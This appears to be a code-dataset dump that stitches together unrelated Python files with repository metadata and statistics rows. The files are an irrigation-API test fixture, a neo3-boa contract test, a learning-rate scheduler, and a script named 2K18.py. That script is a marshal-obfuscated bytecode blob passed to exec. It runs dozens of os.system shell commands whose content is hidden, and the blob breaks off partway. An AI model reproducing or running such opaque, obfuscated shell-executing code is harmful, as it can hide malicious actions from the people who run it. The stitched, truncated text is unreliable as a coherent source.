"allowedSurfaceAcc": 8.3800000000000008,
"maxAllowedDepletion": 0.5,
"precipitationRate": 25.399999999999999,
"currentFieldCapacity": 16.030000000000001,
"area": 92.900001525878906,
"referenceTime": 1243,
"detailedMonthsKc": [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
"flowrate": None,
"soilIntakeRate": 10.16,
},
"customSoilPreset": None,
"customVegetationPreset": None,
"customSprinklerPreset": None,
},
]
}
@pytest.fixture()
def zone_start_stop_json():
"""Return a response for /zone/<ID>/start and /zone/<ID>/stop."""
return {"statusCode": 0, "message": "OK"}
| 33.251748 | 81 | 0.439327 | 359 | 4,755 | 5.78273 | 0.245125 | 0.022158 | 0.028902 | 0.038536 | 0.877168 | 0.828035 | 0.80973 | 0.80973 | 0.80973 | 0.80973 | 0 | 0.184954 | 0.426919 | 4,755 | 142 | 82 | 33.485915 | 0.576881 | 0.045426 | 0 | 0.844961 | 0 | 0 | 0.251274 | 0.028584 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031008 | true | 0 | 0.007752 | 0 | 0.069767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4a51b045b2c6f93644043a330d6b89999a19b3ba | 155 | py | Python | boa3_test/test_sc/interop_test/runtime/CallingScriptHash.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/interop_test/runtime/CallingScriptHash.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/interop_test/runtime/CallingScriptHash.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin.interop.runtime import calling_script_hash
from boa3.builtin.type import UInt160
def Main() -> UInt160:
return calling_script_hash
| 22.142857 | 60 | 0.806452 | 22 | 155 | 5.5 | 0.636364 | 0.132231 | 0.247934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059259 | 0.129032 | 155 | 6 | 61 | 25.833333 | 0.837037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
4396b65d0afeba59d9fd6311235008de268a0946 | 712 | py | Python | openks/models/pytorch/mmd_modules/spcan/utils/lr_scheduler.py | vivym/OpenKS | ea380782162de2e4c1a413f37ad12b85ccb7048a | [
"Apache-2.0"
] | null | null | null | openks/models/pytorch/mmd_modules/spcan/utils/lr_scheduler.py | vivym/OpenKS | ea380782162de2e4c1a413f37ad12b85ccb7048a | [
"Apache-2.0"
] | null | null | null | openks/models/pytorch/mmd_modules/spcan/utils/lr_scheduler.py | vivym/OpenKS | ea380782162de2e4c1a413f37ad12b85ccb7048a | [
"Apache-2.0"
] | 2 | 2021-11-18T06:55:55.000Z | 2021-12-29T15:21:07.000Z | # Learning rate scheduler
def lr_scheduler(optimizer, lr_mult, args, weight_mult=1, ):
counter = 0
for param_group in optimizer.param_groups:
if counter == 0:
optimizer.param_groups[counter]['lr'] = args.base_lr * lr_mult / 10.0
else:
optimizer.param_groups[counter]['lr'] = args.base_lr * lr_mult
counter += 1
return optimizer, lr_mult
def dom_w_scheduler(optimizer, lr_mult, args, weight_mult=1):
counter = 0
for param_group in optimizer.param_groups:
if counter == 0:
optimizer.param_groups[counter]['lr'] = args.base_lr * lr_mult * weight_mult
counter += 1
return optimizer, lr_mult
| 32.363636 | 89 | 0.632022 | 95 | 712 | 4.494737 | 0.252632 | 0.098361 | 0.234192 | 0.189696 | 0.892272 | 0.892272 | 0.892272 | 0.747073 | 0.747073 | 0.747073 | 0 | 0.021236 | 0.272472 | 712 | 21 | 90 | 33.904762 | 0.803089 | 0.032303 | 0 | 0.625 | 0 | 0 | 0.009009 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43c64356544306942d0020aa187340d0879b2b3a | 47,345 | py | Python | 2K18.py | Xeit666h05t/2K18 | 0a07f4652c6f54191a16c5e395db6dfd31eca86d | [
"Apache-2.0"
] | null | null | null | 2K18.py | Xeit666h05t/2K18 | 0a07f4652c6f54191a16c5e395db6dfd31eca86d | [
"Apache-2.0"
] | null | null | null | 2K18.py | Xeit666h05t/2K18 | 0a07f4652c6f54191a16c5e395db6dfd31eca86d | [
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\x1f\x1e\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x02\x00\x84\x00\x00Z\x05\x00d\x03\x00\x84\x00\x00Z\x06\x00e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01d\x05\x00Z\x08\x00d\x06\x00Z\t\x00d\x07\x00Z\n\x00d\x08\x00Z\x0b\x00d\t\x00Z\x0c\x00d\n\x00Z\r\x00d\x0b\x00Z\x0e\x00d\x0c\x00Z\x0f\x00d\r\x00Z\x10\x00d\x0e\x00Z\x11\x00d\x0f\x00Z\x12\x00e\x05\x00e\x0b\x00d\x10\x00\x17\x83\x01\x00\x01e\x13\x00e\x0e\x00d\x11\x00\x17\x83\x01\x00Z\x14\x00d\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x18\x00GHd\x19\x00GHd\x1a\x00GHd\x1b\x00GHd\x1c\x00GHd\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd \x00GHd!\x00GHd"\x00GHd#\x00GHd$\x00GHd%\x00GHd&\x00GHd\'\x00GHd(\x00GHd)\x00GHd*\x00GHd+\x00GHd,\x00GHd-\x00GHd.\x00GHd/\x00GHd0\x00GHd1\x00GHd2\x00GHd3\x00GHd4\x00GHd5\x00GHd6\x00GHd7\x00GHd8\x00GHd9\x00GHd:\x00GHd;\x00GHd<\x00GHd=\x00GHd>\x00GHd?\x00GHd@\x00GHdA\x00GHdB\x00GHdC\x00GHdD\x00GHdE\x00GHdF\x00GHdG\x00GHdH\x00GHdI\x00GHdJ\x00GHdK\x00GHdL\x00GHdM\x00GHdN\x00GHdO\x00GHdP\x00GHdQ\x00GHdR\x00GHdS\x00GHdT\x00GHdU\x00GHdV\x00GHdW\x00GHdX\x00GHe\x13\x00e\r\x00d\x11\x00\x17\x83\x01\x00Z\x14\x00e\x14\x00dY\x00k\x02\x00sF\x02e\x14\x00dZ\x00k\x02\x00r\xa1\x02d[\x00GHe\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d`\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00db\x00k\x02\x00s\xb9\x02e\x14\x00dc\x00k\x02\x00r!\x03dd\x00GHe\x00\x00j\x07\x00de\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00df\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dg\x00k\x02\x00s9\x03e\x14\x00dh\x00k\x02\x00r\x87\x03di\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dk\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dm\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dn\x00k\x02\x00s\x9f\x03e\x14\x00do\x00k\x02\x00r\xfa\x03dp\x00GHe\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dr\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00ds\x00k\x02\x00s\x12\x04e\x14\x00dt\x00k\x02\x00r\xa1\x04du\x00GHe\x00\x00j\x07\x00de\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dv\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dw\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dx\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dy\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dz\x00k\x02\x00s\xb9\x04e\x14\x00d{\x00k\x02\x00rb\x05d|\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d}\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d~\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x7f\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x80\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x81\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x82\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x83\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x84\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x85\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x87\x00k\x02\x00sz\x05e\x14\x00d\x88\x00k\x02\x00r\xe2\x05d\x89\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dw\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8a\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8b\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x8d\x00k\x02\x00s\xfa\x05e\x14\x00d\x8e\x00k\x02\x00rb\x06d\x8f\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x90\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x91\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x92\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x93\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x94\x00k\x02\x00sz\x06e\x14\x00d\x94\x00k\x02\x00r\xe2\x06d\x95\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x96\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x97\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x98\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x99\x00k\x02\x00s\xfa\x06e\x14\x00d\x99\x00k\x02\x00rH\x07d\x9a\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9b\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9d\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x9e\x00k\x02\x00s`\x07e\x14\x00d\x9e\x00k\x02\x00r\xae\x07d\x9f\x00GHe\x00\x00j\x07\x00d\xa0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa1\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa3\x00k\x02\x00s\xc6\x07e\x14\x00d\xa4\x00k\x02\x00r\x14\x08d\xa5\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa4\x00k\x02\x00s,\x08e\x14\x00d\xa4\x00k\x02\x00r\xae\x08d\xa8\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dw\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xaa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xab\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xac\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xad\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xae\x00k\x02\x00s\xc6\x08e\x14\x00d\xae\x00k\x02\x00r.\td\xaf\x00GHe\x00\x00j\x07\x00d\xb0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb1\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xb4\x00k\x02\x00sF\te\x14\x00d\xb4\x00k\x02\x00r\xa1\td\xb5\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb8\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xba\x00k\x02\x00s\xb9\te\x14\x00d\xba\x00k\x02\x00r\xed\td\xbb\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xbd\x00k\x02\x00s\x05\ne\x14\x00d\xbd\x00k\x02\x00rS\nd\xbe\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbf\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xc1\x00k\x02\x00sk\ne\x14\x00d\xc1\x00k\x02\x00r\xb9\nd\xc2\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xc4\x00k\x02\x00s\xd1\ne\x14\x00d\xc4\x00k\x02\x00rF\x0bd\xc5\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc8\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xca\x00k\x02\x00s^\x0be\x14\x00d\xca\x00k\x02\x00r\xd3\x0bd\xcb\x00GHe\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcd\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xce\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcf\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xd0\x00k\x02\x00rY\x0cd\xd1\x00GHe\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd5\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01d\xd7\x00GHda\x00GHn\x00\x00e\x14\x00d\xd8\x00k\x02\x00r\xc0\x0cd\xd9\x00GHe\x00\x00j\x07\x00d\xb0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xda\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xdb\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xdc\x00k\x02\x00r\'\rd\xdd\x00GHe\x00\x00j\x07\x00d\xb0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xda\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xde\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xdf\x00k\x02\x00r\x9b\rd\xe0\x00GHe\x00\x00j\x07\x00d}\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe1\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xe5\x00k\x02\x00r\xf5\rd\xe6\x00GHe\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe8\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xea\x00k\x02\x00rO\x0ed\xeb\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xec\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xed\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xee\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xef\x00k\x02\x00r\xb1\x0ed\xf0\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf1\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01n\x00\x00e\x14\x00d\xf5\x00k\x02\x00r\xf1\x0ed\xf6\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xf8\x00k\x02\x00rX\x0fd\xf9\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfb\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfd\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xfe\x00k\x02\x00r\xb2\x0fd\xff\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x00\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x01\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x02\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x03\x01k\x02\x00r\x19\x10d\x04\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x06\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x07\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x08\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\t\x01k\x02\x00r\x80\x10d\n\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\r\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0e\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x0f\x01k\x02\x00r\xda\x10d\x10\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x11\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x12\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x13\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x14\x01k\x02\x00r4\x11d\x15\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x16\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x17\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x18\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x19\x01k\x02\x00r\x9b\x11d\x1a\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x1b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x1c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x1d\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x1e\x01k\x02\x00r\xf5\x11d\x1f\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d \x01\x83\x01\x00\x01e\x00\x00j\x07\x00d!\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d"\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d#\x01k\x02\x00rB\x12d$\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d%\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d&\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\'\x01k\x02\x00r\x8f\x12d(\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d)\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d*\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d+\x01k\x02\x00r\xdc\x12d,\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d-\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d.\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d/\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d0\x01k\x02\x00r)\x13d1\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d2\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d3\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d4\x01k\x02\x00r\x90\x13d5\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d6\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d7\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d8\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d9\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d:\x01k\x02\x00r\xea\x13d;\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d<\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d=\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d>\x01k\x02\x00rD\x14d?\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d@\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dA\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dB\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dC\x01k\x02\x00r\x9e\x14dD\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\